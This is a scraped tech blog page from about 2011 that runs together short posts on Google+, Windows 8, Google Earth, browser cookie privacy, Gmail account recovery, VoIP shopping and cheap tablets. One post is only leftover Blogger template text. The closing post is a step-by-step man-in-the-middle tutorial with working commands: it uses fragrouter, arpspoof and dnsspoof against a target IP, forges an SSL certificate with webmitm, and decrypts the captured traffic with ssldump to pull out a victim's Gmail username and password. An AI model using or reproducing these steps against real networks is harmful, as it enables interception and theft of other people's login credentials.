Transparent White Star

GooGle Is SPyIng US ?

That words across my mine during web-surfing, while my gmail and iGoogle account still logged in. Moreover I like Chrome to get any information through internet. Does Google really spy on me? If you open History in Chrome, you will be amazed by how well-organize Chrome doing it.

How Does Google+ Stack Up Against Facebook?

With Google+, the behemoth of Web search may have finally figured out social networking. Demand for Google+ invites is reportedly through the roof, and critics are generally pleased with how the service works..

Angry Birds Now in Windows Phone Marketplace

At last. Angry Birds is now available in the Windows Phone Marketplace—a few hours ahead of schedule and so fresh it hasn’t even been rated yet! Be the first—or just hunker down with your phone and get dem pigs. .

WindOwS 8 is Cool Enough ?

On Tuesday, Microsoft showed off the first tablets running Windows 8, and provided a bunch of new details about the operating system.

Secure Browseing Is The Way To scuess

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.

Google Earth Reaches 1 Billion Downloads (Video)


Google Earth was first launched back in 2005, and Google has now announced that Google Earth has reached over 1 billion downloads around the world, and this number includes the mobile version, thedesktop version, and the browser plug in version of Google Earth.
Google Earth
We’re proud of our one billion milestone, but we’re even more amazed at the way people have used Google Earth to explore the world. When we founded Keyhole, Inc. back in 2001 (the company was acquired by Google in 2004), we never imagined our geospatial technology would be used by people in so many unexpected ways. At www.OneWorldManyStories.com, we’ve collected stories from people all over the world who use Google Earth to follow their dreams, discover new and distant places, or make the world a better place.
You can find out more information about Google Earth over at the Google Lat long Blog.
Source The Next Web

3M Develops Film That Will Turn Your Windows Into Solar Panels


3M has developed a new solar film that can be used with existing windows, and the transparent film will then turn your existing windows into solar panels, and the film is expected to go on sale in 2012.
The film is rumored to cost around half as much traditional solar panels, but at the moment the film is only capable of generating about 20 percent of the electricity that is generated by current solar panels.
Glass Windows
The 3M Film is apparently easier to install than existing solar panels and it takes up less room as no additional space is required, and it can also operate under lower sunlight conditions that traditional solar panels.
It sounds like an interesting idea, and the fact that it can easily be installed to existing windows without much hassle could make it popular.
Source Computer World

Browsers War: Firefox Tops Cookie Control and Privacy



Everyone who accesses the Internet uses a browser program. Some people prefer Internet Explorer; some prefer Google Chrome. Other people swear by Mozilla Firefox, including most Internet entrepreneurs. IE has an initial advantage, for it's the default browser when you buy a Windows PC, laptop or notebook, but fewer users stay with IE for the duration. Most people switch to either Google Chrome or Mozilla Firefox for additional features, add-ons and versatility.
What's Similar???

First, all three browser programs are free, which is always good news for budget shoppers.
  
IE, Chrome and Firefox all allow multiple-tabbedmultiple-window browsing. All allow tab separation into independent windows.

All three allow Private Browsing, which means visited sites are not listed in your browser's History file. Your ISP knows you've been there, and any cookies you accept on Private Browsing settings do register on your system, and visited site information is available on those cookies, but for casual checks, Private Browsing visitations aren't listed. Most people don't check beyond the History file, so presents or flowers you order online as gifts won't be easily displayed: Your surprise gift search is safe.

All say they allow full user control over cookie placement, but unfortunately, IE and Chrome actually don't.

What's Different???

Chrome developed a unique virus or browser hijacking safety feature. It's called tab buckets
Everything you do in a tab stays there. It's like a mini-cache that is emptied when you close the tab. If you have three tabs open in a single window, any hijack attempt in one bucket does not infect your entire window or your computer. If your anti-virus program doesn't pick up the virus or hijack snippet, you're still safe—so long as it's caught by Chrome's programming.

Both IE and Chrome allow back-door cookie placement from paid advertisers and data miners. You may disallow front-door cookie placement via your cookie control panel in Tools – Options – Privacy. However, only Mozilla Firefox actually understands that 'no means no.' If you disallow a cookie, you won't get a cookie placed, just because an advertiser or media firm wants to know where you browse and what types of things you buy online.

Look in your Cookies folder. Compare cookies placed with your cookie-placement instructions and website URL disallowance list. If you use either IE or Chrome, odds are pretty fair that you'll have more cookies on your computer than you thought you did.

Those extra, hidden cookies are what generate a lot of the spam you receive. The more you surf while those cookies are gathering information, the more data that's collected and sold by data miners. Advertisers buy, rent or lease those lists based on your browsing history to send what's called “highly targeted marketing notices.”
Even if you visit a site for research for a paper in school, data miners will know that, and you may find yourself receiving advertiser's emails, simply because you visited an information site on that topic. Yes, it's spam. Yes, it's illegal, but few spammers actually are investigated, charged and fined. That cookie placement of which you don't know might be considered as “implied consent.” You may not have said “yes” to the placement, but because you didn't say “no,” whether you knew about it or not, may give spammers and data miners the green light for unsolicited emails.

Each browser has its unique advantages and disadvantages, but of these top three browsers, only Mozilla Firefox allows you, the user, self-determination on your browsing privacy control.

How to recover a Hacked or Compromised Gmail Account?

Now a days, hacking gmail account is increasing.  Most of people doesn't know how to be secure(because they doesn't visit BreakTheSecurity).  So please refer our website to your friends as Security tips Blog. Ok let me come to the point.  In this article, i will explain how to recover your hacked or compromised gmail accounts.

First of all verify yourself whether your entering the correct password. Also check whether the caps lock is turned on.

How to Recover Your Gmail Account?
If you believe your account is hacked, then visit click the Can't access your account? link below the signin button in gmail.



Enter the Email address . it might ask for CAPTCHA ,fill it and continue.

option 1: If you have secondary email address, select secondary mail and ask to send the password to your secondary mail address.

option 2:  Answer to your security question and change the password

option 3: if you have added mobile number in your account. then you can recover through mobile.

Contact Gmail:
If the above option doesn't work for you? then you have to contact the gmail.


Visit
https://www.google.com/support/accounts/bin/request.py?ara=1

It will ask whether the password recovery option worked or not. Click "No" button.  It will ask you to enter the information about your email account.  Fill everything. They will ask to enter the email to contact you, enter the alternative email address that you have.(if that also hacked, then create new account and enter it).



Submit the form.
They will contact you soon.


FAQ About Account Recovery

Q. Why can't I tell someone private information about my account that they could look up to verify my claim?
A. Account privacy rules are very strict within Google, and allowing employees to look at the contents of an account would be a serious breach of privacy.

Q. Why isn't there a comments section on the Account Recovery Form where I could add additional information to prove my claim?
A. Like above, it would be a violation of account privacy for an employee to look in the account to verify any additional information supplied.

Q. Why can't I simply talk to somebody about this?
A. Unfortunately, Google does not offer live support for the free Gmail product (see: http://mail.google.com/support/bin/request.py?contact_type=contact_policy). You must use the recovery methods provided.

Q. Why can't Google lock the account to protect it from any more damage or outgoing spam.
A. They will lock an account that the detection system identifies as being compromised and sending out spam. But again, privacy concerns would prevent them from simply locking an account because someone claims it's theirs and is compromised. In addition, since there is no live support, there is no one to even make such a request to.

Q. I had a really long password of random strings that would be impossible to guess. How was my account compromised?
A. Google (as most e-mail providers) have blocks to prevent trying lots of passwords to guess the correct one (brute-force attacks). Most accounts are compromised by harvesting passwords other ways. While a secure password is important, it's only one in a long list of things needed to keep any online account secure.

Q. But I'm very careful with my password. I don't give it to anyone except an official request from Gmail.
A. Unfortunately if you provided your password in response to any e-mail (even claiming to be from Google/Gmail) then your password was harvested by phishing. It's very common, and can trick even the most careful people.

Q. My contacts were deleted by the hacker, how do I recover them?
A. Deleted contacts can now be restored to any point in the last thirty-days: http://mail.google.com/support/bin/answer.py?hl=en&answer=1069522

Q. My e-mail history was deleted by the hacker, how do I recover it?
A. Have you looked in All Mail and Trash for the missing information? Have you used Search to try and find it? Unfortunately, messages deleted from Trash or Spam can not be recovered. If you would like to request Google attempt to recovery messages deleted by a hacker, see: http://mail.google.com/support/bin/answer.py?hl=en&answer=8256

Q. My account was deleted by the hacker, can I recover it?
A. The Account Recovery Form can sometimes restore a recently deleted account. That is your only option in this case.

Q. I don't care about the account, can I just get the e-mail history or the contacts from it.
A. Unfortunately, you have to be able to access the account in order to transfer any information out of it. This means you need to try and recover the account.

Q. I don’t care about the contents, I just need the e-mail address back because I have other things linked to that address.
A. Account names are never re-used, so you can’t re-create the account. So to get the name back you will have to try and recover the account.

Q. Can I find out who did this? Can anyone prosecute them?
A. About the only information you have available is the list of the last 10 IPs to access your account (see the Details link below the Inbox). But given how easy it is to fake IPs, and how inaccurate they are, it's unlikely that more than a general location can be determined. In general, law enforcement is not interested in a simple compromised account, and Google is not a law enforcement agency. Bottom line is: one's energy is better spent on recovery and re-securing the account.

Q. Isn't what the person did illegal? Can I sue them or get them arrested?
A. Any legal questions should be asked of local law enforcement or an attorney. Google is neither of those and can not advise you on any actions.

Q. Can I find out what they did in my account while they had access.
A. There are no account activity logs available, so you can’t find out for sure. If there is spam in your Sent Mail, they you know they used the account for that. But there’s no way to know if or what messages they may have looked at, so take appropriate precautions.

Q. How was my account compromised?
A. There are many ways passwords can be harvested and account compromised, but the most common ones include:
  • Using the same password on multiple web-sites. A less secure site is hacked and they get the user database (e-mail and password) and then just try them all. If the person did not use a unique password, the hacker gains access to the e-mail account.
  • Phishing e-mails that ask for account information or direct you to a phishing web-site. Don't dismiss this because the messages are a lot more convincing that you would imagine, often using text copied from actual Google e-mails or on-line forms.
  • Use of a computer that is infected with a key-logger or other malware (most common for public computers like at a school or library) which records your login information.

When you reclaim Your Account:

Begin by scrolling to the bottom of your Gmail page and see if there are any other sessions signed into your account ("This account is open in 1 other location"). Then click the word "Details" where it says "Last account activity" and then "Sign out all other sessions". Now change your password to anything reasonable but without worrying too much about how secure because you are going to change it again. Next check all the following items and verify that they are set correctly.

Note: in the following “Settings” means “Mail settings” as found under the Gear icon in the upper/right of the Gmail window. If you still have the old layout, then “Settings” will be one of the choices along the top. If you have the older “Settings” link, some of the paths below will be slightly different.


Account Security:
  • Settings -> Accounts and Import -> Change Account Settings -> Change Password [pick a new secure password]
  • Settings -> Accounts and Import -> Change Account Settings -> Change password recovery options [verify secret question, SMS and recovery e-mail address]
  • Settings -> Accounts and Import -> Change Account Settings -> Other Google account settings -> Email Address -> Edit [verify your name and other settings]
  • Settings -> Accounts and Import -> Change Account Settings -> Other Google account settings -> Authorizing applications & sites [revoke Access to any sites listed]
  • Settings -> Accounts and Import -> Change Account Settings -> Other Google account settings -> Using 2-step verification [enable 2-step verification]

Potential Spam:
  • Settings -> General -> Signature [make sure nothing as been added]
  • Settings -> General -> Vacation Responder [make sure it's disabled and empty]

E-mail Theft
  • Settings -> Forwarding and POP/IMAP -> POP Download [disabled]
  • Settings -> Forwarding and POP/IMAP -> IMAP Access [disabled]
  • Settings -> Forwarding and POP/IMAP -> Forwarding [disabled or correct address]
  • Settings -> Filters [no filters that forward or delete e-mail]
  • Settings -> Accounts and Import -> Send Mail As [make sure it is using your correct e-mail address, delete any unrecognized entries]

Want to get best VoIP service – Here is how you can.


Most of the smart landline phone users are planning to make the big move and shift themselves to the VoIP service. However it is easier said than done. As with the case of too many choices, there are so many VoIP providers out there that choosing the best almost seems to be an impossible task to accomplish. Well, you don’t need to worry. This step by step by guide will help you determine the best VoIP service without any hassle.
What you need and how much you can pay for it?
Straight away going for any of the advertised phone services is not the right way to proceed. The first step in getting a good VoIP service is to determine what you really need to have. There are many different types ofVoIP providers out there. First determine where your most calls will be made, like foreign or local. What will be your frequency of calling and how many monthly calls will you have to make? Once you are able to decide on that, then the next step is to know the total amount of budget that you can cough out to get hold of a phone service. After deciding about these two important factors, now we look at the necessary ingredients of a good phone service.
Important qualities of the VoIP service
Here is a review of the things that you must need to have in order to decide about a perfect internet phone service for yourself.
Low call rates
Call rates seem to be a fairly easy thing to decide but it is more like looking under the fold. The advertisedrates are often very low which lure in the new customers but once they get their first monthly phone bill, only then they are able to realize that there were many hidden charges as well which weren’t earlier advertised. However, you don’t need to be sad about it. Axvoice VoIP service and few other trusted names in the internet phone industry clearly advertised what they are offering to their customers. You can also ask in detail from a phone service of the hidden charges in order to know exactly what you will have to pay.
Quality service features
A lot of phone users only want to see a long list of service features in their phone service but few realize that they have to look for their needs and match them with the features instead of getting impressed by a long list. The need analysis that we earlier talked about helps you know which features you really need to have.
Good customer support
Customer support is vital to using a phone service trouble free. Customer reviews is a good way to know what kind of support does a VoIP service offer to its current customers. This way you will be able to know in advance whether a company will be able to help you out in a troubled situation or not.
Taking more time to select a VoIP service is much better than wasting money on a phone provider that is not capable of satisfying all your phone needs or costs more than required to get a phone service.
Targeted Keywords
VoIP service

Prototype battery case charges in just ten minutes


A cool new battery case from NTT DoCoMo can charge in just ten minutes. The case then passes on its power to the phone at regular-charge speed whilst on the move.
The prototype case, debuted at Ceatec 2011 in Japan, employs lithium-tintanate battery technology – a modified form of the more standard lithium-ion battery – to achieve super-fast recharge speeds.
The case itself seems a bit bulky and is designed to fit over a regular phone as a sort of backup power system for those times when you forget to charge it. The fact that NTT DoCoMo is not simply incorporating the lithium-tintanate technology directly into the regular phone battery suggests that it is not ready for mainstream adoption, possibly due to the bulky nature of the current batteries compare to their lithium-ion counterparts.
There is no indication from NTT DoCoMo about pricing, or when the super-charge case might see a release; something not uncommon for trade-show previews of next-gen technology. we don’t even know yet what phones will be supported as every handset is different. Surely some modular battery and casing will be required for cater for lots of phones?
The battery in the case has some similarities to the Super-Charge Battery from Toshiba, which can charge to 90 percent capacity in five minutes and is touted as a ‘super safe’ battery, capable of withstanding ruptures and functioning in extremely low temperatures (though there is no evidence that the same applies to the NTT DoCoMo version).
Backup batteries that allow users to charge their phone when not near a power outlet are nothing new; solutions exist for the iPhone and most other mobile devices. What sets the NTT DoCoMo solution apart is the combination of a charging case and the super-fast re-charge speeds promised.
Read more at CNET

Read More

Brilliant Trio Create Breath Powered Charger


Dispel those smartphone fantasies though. It’s not like this breakthrough means that in a few years,breathing into your iPhone can juice it up. (Don’t you wish?) But the concept is feasible in the medical field at least. Thanks to the ongoing miniaturization revolution, a trio of scientists devised a way for breathing to create a microwatt of energy.
Human Nose
Seen above is a gigantic human nose, your future microwatt power source.
Okay, so the big question this shattering reveal inspires is, “How?” Here’s the answer that: between the collaborative trio of assistant professor Xudong Wang, his colleagues Jian Shi, and Chengliang Sun (all from University of Wisconsin-Madison), a somewhat functional pizoelectric microbelt whose material is susceptible to electric charges can be used to create breathe-powered electricity.
So imagine a small wired device like the one described above stuck to a hospital patient’s nose. The constant respiration produces enough charge to power the medical accoutrements that keeps tabs on their vital signs. It’s a sustainable solution that could very well mark a new era in hospital care.
Don’t expect to see this kind of technology in action the next time you check in at the local hospital—it’s still in its prototypical stage. In fact, the inventive trio behind it have only gone as far as publishing their research in an academic journal.

Source Physorg

Read More

$35 Aakash Android tablet for students launches in India


In July last year India’s Human Resources Development Minister, Kapil Sibal, unveiled the world’s cheapest tablet expected to cost just $30, or $15 with a government subsidy. That’s an impressively low price for such a device, and one no other tablet gets close to matching.
The original specs were pretty good too. A 10-inch touchscreen, 2GB of RAM, USB and Wi-Fi built in, plus a Linux OS shipping with OpenOffice, a PDF reader, web browser, video chat app, and media player.
15 months later and the tablet has appeared, but it isn’t quite $30, and the spec is nowhere near that touted last year.
The tablet is called Aakash and has been developed by UK company DataWind, but assembled in India. It costs $35 to purchase for the Indian government and runs Android 2.2 (Froyo). The display is now a 7-inch resistive unit (800 x 480), the RAM has been cut to just 256MB, and internal storage stands at 32GB. Connectivity is offered in the form of two USB 2.0 ports and a 3.5mm headphone jack. Battery life is only 3 hours from the 2100mAh battery.
Although it runs on Android there is no access to the Android Market. The main purpose of the device is for education and is compatible with .DOC, .DOCX, .PPTX, and .PDF formats. An iPad this is not, but if you can’t afford anything else then it’s something to work with and cheap enough for governments to buy in large quantities.
A consumer version will also be available next month for $60 with the added bonus of a SIM card slot allowing for mobile Internet access.
To begin with, 100,000 units have been ordered by the Indian government for students who will receive the tablet for free. If that goes well the Aakash will be bought in greater quantities, which in turn will bring the price down to the originally promised $30 mark or possibly even lower.
Read more at India Times

Read More

Concept :-

It is nothing but an attacker who sits in between the two user in an network. Normally the two person will be the user and the router(gateway) in an network. The attacker will try to do few trick and replace the roll of router and he sits in his position. This is done by doing DNS spoofing, ARP poisoning, IP spoofing and few more other method. In this attack the user will not come to know that, his traffic is been forwarded through the attacker in the network. The attacker can simply gather information about the user and use it later or attacker can try to do active attack to the user.




Definitons : 
  • SSL :
  • Secure Sockets Layer, a computing protocol that ensures the security of data sent via the Internet by using encryption . With SSL, client and server computers exchange public keys, allowing them to encode and decode their communication. So any attacker tries to sniff traffic between them will only get encrypted garbage values... the web servers which use SSL are denoted by HTTPS ...
  • ARP :
  • Address Resolution Protocol is a network layer protocol used to convert an IP address into a physical address such as an Ethernet address( MAC address ). A host wishing to obtain a physical address broadcasts an ARP request onto the TCP/IP network. The host on the network that has the IP address in the request then replies with its physical hardware address.
  • DNS :
  • Domain Name System is a database system that translates a domain name into an IP address. for example if you type gmail.com in your browser , your DNS will reply with gmail's ip so that,your router can connect to gmail's server using its IP....for better understanding type -->" nslookup " in your cmd or konsole and then type "gmail.com" ,you will see your DNS replies you with gmail's ip addresses .
  • ARP Spoofing :
  • ARP spoofing is a technique in which a host in a LAN can "poison" the ARP table of another host by forging fake ARP requests and replies , causing it to send packets to the wrong destination. The attacker can modify the traffic in the network such a way that it will redirect all traffic to go through it. ARP Spoofing will allow an attacker to sniff data frames.
  • DNS Spoofing :
  • DNS spoofing is similar to arp spoofing ,it is based on the presentation of false or fake DNS information to the slave in a response to their DNS request and as a result forcing them to visit a site which is not the real one.
  • MITM :
  • Man in the middle attack means intercepting a communication between two systems ,both ARP Spoofing and DNS Spoofing are types of MITM attack..
  • IP Forwarding :
  • IP forwarding enables one host to sit on two LANs and to act as a gateway forwarding IP packets from one LAN to another.

Tools: 
  • Fragrouter - tool used to for ip forwarding between slave and its destination host.
  • Arpspoof - to arp spoof slave machine and its host
  • Dnsspoof - to dns spoof slave machine and its host
  • Webmitm - its a tool which transparently proxies and sniffs HTTP / HTTPS traffic redirected by dnsspoof, capturing most "secure" SSL-encrypted webmail logins and form submissions...
  • Wireshark - it is a network protocol analyzer . here its used to capture ssl encrypted traffic between slave and webmitm...
  • Ssldump - decrypts ssl packets using private key

All these tools are installed in backtrack 5..



Step 1: First we need to setup ip forwarding using fragrouter. open a shell and type the command...

Code:
fragrouter -B1


This is to forward packets between the slave and its gateway while spoofing .... minimize the shell..

Step 2: Now we need to arp spoof the slave , open a new shell and type the command.

Code:
arpspoof -t [target ip] [default gateway ip]

example :

arpspoof -t 192.168.1.7 192.168.1.1


then minimize the shell .... now we have begin to arpspoof the slave...

Step 3: then for dns spoofing open a new shell and type

Code:
dnsspoof


then minimize the shell.... now all the DNS request from the slave will be redirected to us..

Step 4: To give proxy for these DNS requests ,we have to start up Webmitm open a new shell and type.

Code:
webmitm -d

if you were starting Webmitm for the first time it will ask you some details to create fake SSL certificate and private key ... just fill something in it...if you fill everything,then it will say " webmitm relaying transparently "


ok its done, minimize the shell..

Step 5: Now we need to capture the traffic using wireshark

Code:
applications ->backtrack -> information gathering ->network analysis ->network traffic analysis ->wireshark

Step 6: In wireshark select

Code:
capture -> interfaces -> start (cick start button near eth0 )

that's it

since the Dns has been spoofed, we can see the nslookup for gmail in slave computer shows attacker's ip :


In our case slave opens "gmail.com" in browser .He will be redirected to webmitm , which will issue the 'gmail page' with fake ssl certificate ,then our slave well log into "gmail" using his credentials... now all the traffic will be captured by wireshark ...then just stop the wireshark and save the captured traffic to root folder ... for example, i will save it as "test"..


In the root folder there will be another file called "webmitm.crt"..it is the fake ssl certificate generated by webmitm...
Now we have captured ssl packets and our own fake ssl certificate..


now to decrypt the captured packets...
open another new shell and type :

Code:
ssldump -r test -k webmitm.crt -d > finaloutput


were,
test -->captured packets
webmitm.crt --> SSL certificate
finaloutput --> decrypted output file

now open a shell and type :

Code:
cat finaloutput | grep Email


it will show you the decrypted username and password .
Read More

Newer Posts Older Posts Home

Share

Twitter Delicious Facebook Digg Stumbleupon Favorites More